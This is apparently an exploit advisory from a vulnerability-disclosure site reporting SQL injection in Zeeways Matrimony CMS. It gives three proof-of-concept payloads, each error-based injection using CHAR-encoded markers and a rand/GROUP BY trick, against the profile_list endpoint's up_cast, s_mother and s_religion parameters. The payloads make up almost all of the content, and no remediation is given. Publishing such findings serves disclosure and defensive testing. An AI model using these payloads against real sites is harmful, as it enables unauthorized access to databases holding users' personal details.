Zeeways Matrimony CMS - SQL Injection

2019.03.26
in Hritik R (IN) in
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

----- PoC 1: SQLi ----- Request: http://localhost/[PATH]/profile_list Vulnerable Parameter: up_cast (POST) Payload: (select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(117),CHAR(82),CHAR(120),CHAR(106),CHAR(69),CHAR(48),CHAR(117),CHAR(107)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)) ----- PoC 2: SQLi ----- Request: http://localhost/[PATH]/profile_list Vulnerable Parameter: s_mother (GET) Payload: (select 1 and row(1%2C1)>(select count(*)%2Cconcat(concat(CHAR(52)%2CCHAR(67)%2CCHAR(117)%2CCHAR(113)%2CCHAR(82)%2CCHAR(106)%2CCHAR(97)%2CCHAR(51)%2CCHAR(113)%2CCHAR(122)%2CCHAR(116))%2Cfloor(rand()*2))x from (select 1 union select 2)a group by x limit 1)) ----- PoC 3: SQLi ----- Request: http://localhost/[PATH]/profile_list?s_mother=1 Vulnerable Parameter: s_religion (POST) Payload: (select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(50),CHAR(86),CHAR(74),CHAR(77),CHAR(54),CHAR(109),CHAR(84),CHAR(73)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top